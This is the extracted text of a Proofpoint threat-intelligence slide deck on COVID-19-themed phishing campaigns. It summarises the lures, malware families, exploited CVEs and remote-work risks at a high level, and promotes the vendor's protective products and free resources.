Phishing During a Pandemic: Actors, Campaigns & Threats ... · 02/06/2020 · All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse Global vs COVID Brand Abuse

Phishing During a Pandemic: Actors, Campaigns & Threats Leveraging COVID-19 Lures20 May 2020

© 2019 Proofpoint. All rights reserved

Global Campaigns By Campaign Family

Global COVID-Themed Campaigns By Campaign Family

3© 2019 Proofpoint. All rights reserved

All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse

Global vs COVID Brand Abuse Trends

© 2019 Proofpoint. All rights reserved 4


Silent Librarian

Modest

Veers

Covid-19 Map

Covid-19 Fake Bill

Covid WHO Lure

LURES ACTORS



• High risk home network• Traditional VPN could allow

lateral movement

• Going straight to cloud apps from home office

• Traditional visibility limited• Possibly personal device with

uncertain security posture

• Targeted by phishing and BEC (likely leveraging COVID-19 lures)

• Low level of awareness for secure remote working

• No longer on corporate network

• Higher risk for downloaders pulling down secondary payloads

Key Changes to Secure Posture for Remote Work

8

Protecting transitions to remote workPeople-Centric Secure Remote Access

9

Insider Threat Management for increased visibility into what remote workers do with sensitive data

ZTNA for rapid, zero trust implementation of secure remote access to on prem systems and data without any hardware

Email protection for protection from threats, awareness training for secure remote work practices

Isolation to provide secure web browsing and BYOD access to SaaS applications

CASB for visibility, RBA, threat protection, and DLP across cloud apps

10

Covid-19 Threats

Relentless focus on credential phish

Legitimate filesharing abuse

More complex multi-stage threats

More BEC variants

Sophisticated attacks on Office 365 and G Suite accounts

11© 2020 Proofpoint. All rights reserved | Proofpoint, Inc. - Confidential and Proprietary

Covid-19 Threats




More BEC variants


office[.]com docs[.]google[.]com windows[.]net sharepoint[.]com

Domains with Most Threats Detected

12

Covid-19 Threats




More BEC variants


CVE-2017-8570 + OLE

SquibblyDoo(regsvr32.exe)

Lemon Tree (PoSH)

© 2020 Proofpoint. All rights reserved | Proofpoint, Inc. - Confidential and Proprietary

Covid-19 Threats




More BEC variants


Covid-19 Threats




More BEC variants


Malicious Third-Party Apps

COVID-19By the Numbers


75 Million

COVID-19 Volume


330+

Campaigns Tracked

malicious messages

(April 18-22)

Actors are motivated and integrating different themes spanning global to personal

Campaign themes


Intrinsic

Mixed

Extrinsic

LocalRegional

Global

Tactical Operational Strategic

Widespread Mixed Focused

Prim

ary

Mot

ivat

ions

Delivery

Themes

Survival kits, Medical Supplies, cases near

me

Shipping, manufacturing

Retail, Banking

Tax reduction

Transnational… anti-bacteria credit card

Netherlands

Secondary Motivations

BEC

Markets, World Health

Organization

China, Italy, Netherlands,

Germany, United States,

Japan, Australia

Personal

Tactics Leveraging Coronavirus Malware Payloads

• Emotet• AZORult Stealer• AgentTesla Keylogger• GuLoader / NanoCore RAT• Microsoft Office Phish• HawkEye Keylogger• Betabot• Ave Maria / GuLoader / Remcos• Ave Maria / Remcos / LimeRAT• LimeRAT• Ostap / The Trick

Across the Threats


MALICIOUS ATTACHMENT

MALICIOUS URL

CREDENTIAL PHISHING

BEC AND EMAIL FRAUD

FILE NAMES DOMAIN NAMES

Threat FocusExamples from the Landscape


Threat Overview

• Summary: Campaign distributing RemcosRAT/downloader with 2 lures (one COVID-19, one harassment)

• Subject: Sexual harassment report / package notification

• Tactics and Tools: .iso image file• Malware: Remcos RAT• Volume: Widespread distribution


Remcos RAT – COVID-19

Threat Overview

• Summary: Campaign spoofing US Department of Labor

• Lure: FMLA adjustments • Technique: IcedID (modular malware)• Volume: broadly targeted


Family and Medical Leave Act

Threat Overview

• Summary: Message purporting to be from World Health with WHO seal

• Subject: “COVID-19 HIGH RISK VSL / URGENT”

• Tactics and Tools: Microsoft Office attachments that use exploits (Equation Editor, CVE-2017-11882, CVE-2017-8570, macros) to download Agent Tesla

• Volumes: 4000~ Messages– 372 Organizations– 44% Transportation– 15% Energy

Agent Tesla port vessel (1/2)


Threat Overview

• Summary: Message purporting to be from World Health with WHO seal

• Subject: “COVID-19 HIGH RISK VSL / URGENT”

• Tactics and Tools: Microsoft Office attachments that use exploits (Equation Editor, CVE-2017-11882, CVE-2017-8570, macros) to download Agent Tesla

• Volumes: 4000~ Messages– 372 Organizations– 44% Transportation– 15% Energy

Agent Tesla port vessel (2/2)


Threat Overview

• Summary: Campaign leveraging Word documents and Squibblydoo technique to launch Powershell script

• Subject: The Truth of COVID-19 ????????????

• Tactics and Tools: Word (RTF) documents used Squibblydoo to launch a PowerShell script. Followed by downloads of Mimikatz and remote desktop utility 'FreeRDP’

• Malware: Mimikatz via Powershell Script Then download of a remote desktop utility FreeRDP

• Targeting: 80 PFPT customers across 36 verticals.

The Truth of COVID-19 (1/1)


• Spoofed offers of relief from financial institutions

• Primarily steals for credit card, direct deposit details, and other forms of financial data

• Most prevalent in the United States; also present in Europe, Australia, and Africa

Emerging Trends


Proofpoint and COVID-19Summary, our position, updates, questions


© 2020 Proofpoint. All rights reserved | Proofpoint, Inc. - Confidential and Proprietary 27

PEOPLE-CENTRIC PROTECTION

DATA AND ACCESSCONTROLS

Advanced Email Security

Cloud Accounts

InternalEmail

Personal Webmail

Endpoint Activity

Web and UnsanctionedApp Access

Sanctioned Access

IdentityDeception

ProtectionTargeted Attack Protection (TAP)

Threat Response Auto-Pull (TRAP)

Internal MailDefense

Cloud Account Defense

EmailIsolation

Email DLP

Email Encryption

CASB DLP

BrowserIsolation

Zero Trust Access

Email FraudDefense

InsiderThreat Management

Cloud App Governance and Data Protection

Information Protection

AWARENESSAND TRAINING

Protect people from the threats that

target them

Enable users to protect themselves and your organization

Protect the data people create and access from

security and compliance risk

Response and Resources

• Detection for commodity remains strong

• TAP Campaigns being tracked as “COVID-19”

• Set of COVID-19 hunting and detection IDS sigs available open source in ET Open

– http://rules.emergingthreatspro.com/open/

• Free Meta VPN solution through September 2020

Continuing Updates

• Updates– Proofpoint blog updates

• https://www.proofpoint.com/us/blog

Response


@threatinsight

https://www.proofpoint.com/us/blog

Other Resources (All Free)

• Proofpoint Meta available to all Proofpoint customers at no charge for zero trust network access

• Security Awareness Training attack spotlight: Covid-19 lures

• Remote worker-tailored training modules

• Partner offer: MFA and SSO from Okta: https://www.okta.com/okta-for-emergency-remote-work/


https://www.okta.com/okta-for-emergency-remote-work/

Documents

Phishing During a Pandemic: Actors, Campaigns & Threats ... · 02/06/2020 · All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse Global vs COVID Brand Abuse